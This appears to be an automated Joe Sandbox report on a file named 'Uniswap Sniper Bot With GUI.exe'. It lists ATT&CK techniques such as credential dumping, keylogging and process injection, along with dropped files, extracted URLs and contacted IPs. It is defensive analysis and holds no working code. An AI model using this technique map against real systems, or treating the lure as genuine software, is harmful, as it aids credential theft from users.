Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 DLL Side-Loading	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	11 Masquerading	121 Input Capture	24 System Information Discovery	Remote Desktop Protocol	121 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Registry Run Keys / Startup Folder	12 Process Injection	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	12 Process Injection	NTDS	1 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	3 Process Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Uniswap Sniper Bot With GUI.exe	13%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\.pyp\DLLs\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_bz2.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_decimal.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_elementtree.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_lzma.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_msi.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_queue.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_socket.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_ssl.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_uuid.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_zoneinfo.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\libffi-8.dll	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\pyexpat.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\select.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\sqlite3.dll	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\winsound.pyd	0%	ReversingLabs
C:\Users\user\.pyp\Lib\abc.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\aifc.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\argparse.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\ast.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asynchat.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\__init__.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\__main__.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\base_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\base_futures.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\base_subprocess.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\base_tasks.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\exceptions.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\format_helpers.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\futures.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\locks.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\log.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\mixins.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\proactor_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\protocols.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\queues.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\runners.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\selector_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\sslproto.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\staggered.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\streams.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\subprocess.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\taskgroups.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\tasks.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\threads.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\timeouts.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\transports.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\trsock.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\unix_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\windows_events.py	0%	ReversingLabs
C:\Users\user\.pyp\Lib\asyncio\windows_utils.py	0%	ReversingLabs

Source	Detection	Scanner	Label
http://crbug.com/510270	0%	Avira URL Cloud	safe
https://eth.wiki/json-rpc/API#net_peercount	0%	Avira URL Cloud	safe
https://docs.soliditylang.org/en/latest/abi-spec.html#errors	0%	Avira URL Cloud	safe
https://eth.wiki/json-rpc/API#net_version	0%	Avira URL Cloud	safe
https://myshop.amplify.com/cart/?$	0%	Avira URL Cloud	safe
https://crbug.com/1300575	0%	Avira URL Cloud	safe
http://crbug.com/110263	0%	Avira URL Cloud	safe
https://crbug.com/593024	0%	Avira URL Cloud	safe
http://anglebug.com/4722forceRobustResourceInitForce-enable	0%	Avira URL Cloud	safe
https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F	0%	Avira URL Cloud	safe
https://crbug.com/710443	0%	Avira URL Cloud	safe
https://mths.be/utf8js	0%	Avira URL Cloud	safe
http://anglebug.com/5658GPU.ANGLE.DisplayInitializeMSFrontend	0%	Avira URL Cloud	safe
https://www.buybuybaby.com/store/cart/?$	0%	Avira URL Cloud	safe
https://ethdocs.org/en/latest/ether.html	0%	Avira URL Cloud	safe
https://crbug.com/1060012	0%	Avira URL Cloud	safe
http://anglebug.com/5750enableCompressingPipelineCacheInThreadPoolEnable	0%	Avira URL Cloud	safe
http://anglebug.com/1452	0%	Avira URL Cloud	safe
http://crbug.com/642605	0%	Avira URL Cloud	safe
http://www.cs.ru.nl/~sjakie/	0%	Avira URL Cloud	safe
http://hyperelliptic.org/tanja	0%	Avira URL Cloud	safe
http://crbug.com/275944	0%	Avira URL Cloud	safe
https://secure.houseofbeautyworld.com/(	0%	Avira URL Cloud	safe
http://pajhome.org.uk/crypt/md5	0%	Avira URL Cloud	safe
http://cr.yp.to/djb.html	0%	Avira URL Cloud	safe
http://materializecss.com)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dualstack.python.map.fastly.net	151.101.0.223	true	false	high
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
cdnjs.cloudflare.com	104.17.25.14	true	false	high
ip-api.com	208.95.112.1	true	false	high
pypi.org	151.101.128.223	true	false	high
www.python.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/node-modules/urlencode	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	false		high
https://url.spec.whatwg.org/#concept-url-origin	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crbug.com/941620allow_translate_uniform_block_to_structured_bufferThere	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/web3/web3.js/issues/6187	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/650547call_clear_twiceUsing	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/browserify/node-util	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.sweetwater.com/store/cart.php/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/maiavictor/xhr-request-promise#readme	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://eth.wiki/json-rpc/API#net_peercount	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eth.wiki/json-rpc/API#net_version	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/4633	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.groupon.com/(checkout/)?cart/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crbug.com/510270	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/unshiftio/ultron	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.harborfreight.com/checkout/cart/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.soliditylang.org/en/latest/abi-spec.html#errors	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wayfair.com/(	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myshop.amplify.com/cart/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/ChainSafe/web3.js/blob/8783f4d64e424456bdc53b34ef1142d0a7cee4d7/packages/web3-eth	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://goo.gl/t5IS6M).	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	false		high
http://crbug.com/110263	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/joshstevens19/ethereum-bloom-filters/blob/fbeb47b70b46243c3963fe1c2988d7461ef1723	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/4722forceRobustResourceInitForce-enable	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/6929	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/ethereum/execution-apis/blob/main/src/eth/execute.yaml	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/593024select_view_in_geometry_shaderThe	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/nodejs/node/pull/21313	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://crbug.com/593024	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.squid-cache.org/Doc/config/half_closed_clients/	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://store.steampowered.com/cart/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.kohls.com/checkout/shopping_cart.jsp$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.nordstrom.com/shopping-bag/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.zennioptical.com/shoppingCart/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/1300575	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/nodejs/node/pull/33661	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/mathiasbynens/punycode.js.git	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crbug.com/710443	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/5658GPU.ANGLE.DisplayInitializeMSFrontend	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://narwhaljs.org)	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://github.com/WICG/scheduling-apis	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/responseXML.	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mths.be/utf8js	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crbug.com/1060012	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/ethereum/web3.js/tree/1.x/packages/web3-shh	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://code.google.com/p/chromium/issues/detail?id=25916	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/paulmillr/noble-hashes/issues/25#issuecomment-1750106284	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ethdocs.org/en/latest/ether.html	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.buybuybaby.com/store/cart/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3997	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crbug.com/642605	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hottopic.com/cart/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/1452	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crbug.com/1165751Disable	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ChainSafe/web3.js	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/execution-apis/pull/201	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.cs.ru.nl/~sjakie/	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bhphotovideo.com/(c/)?find/cart.jsp	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.lulus.com/checkout/bag/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ljharb.codes	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/execution-apis/blob/main/src/schemas/block.yaml#L2	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/ethereum/execution-apis/blob/main/src/schemas/transaction.yaml#L244	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/facebook/react-native/pull/1632	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.hsn.com/checkout/bag/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.unicode.org/copyright.html	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2240452407.0000000005E20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/blueimp/JavaScript-MD5	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282490273.0000000005E20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://opensource.org/licenses/MIT	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282490273.0000000005E20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/2894	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.rei.com/shoppingcart/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/RyanZim/universalify.git	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/5750enableCompressingPipelineCacheInThreadPoolEnable	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crbug.com/275944	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/a/3143231	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.academy.com/shop/cart/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://infra.spec.whatwg.org/#ascii-whitespace	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3970	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://hyperelliptic.org/tanja	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pajhome.org.uk/crypt/md5	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282490273.0000000005E20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/ethereum/web3.js/tree/1.x/packages/web3-utils	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
http://stackoverflow.com/a/16459606/376773	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://secure.houseofbeautyworld.com/(	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://stackoverflow.com/a/5982798/376773	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.qvc.com/checkout/cart.html/?$	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cr.yp.to/djb.html	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://materializecss.com)	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/questions/3966484/why-does-modulus-operator-return-fractional-number-in-ja	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/5901	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/nodejs/node/issues/10673	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3965	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/3729	Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
185.153.182.241	unknown	Russian Federation	35913	DEDIPATH-LLCUS	false
151.101.0.223	dualstack.python.map.fastly.net	United States	54113	FASTLYUS	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574361
Start date and time:	2024-12-13 09:34:50 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
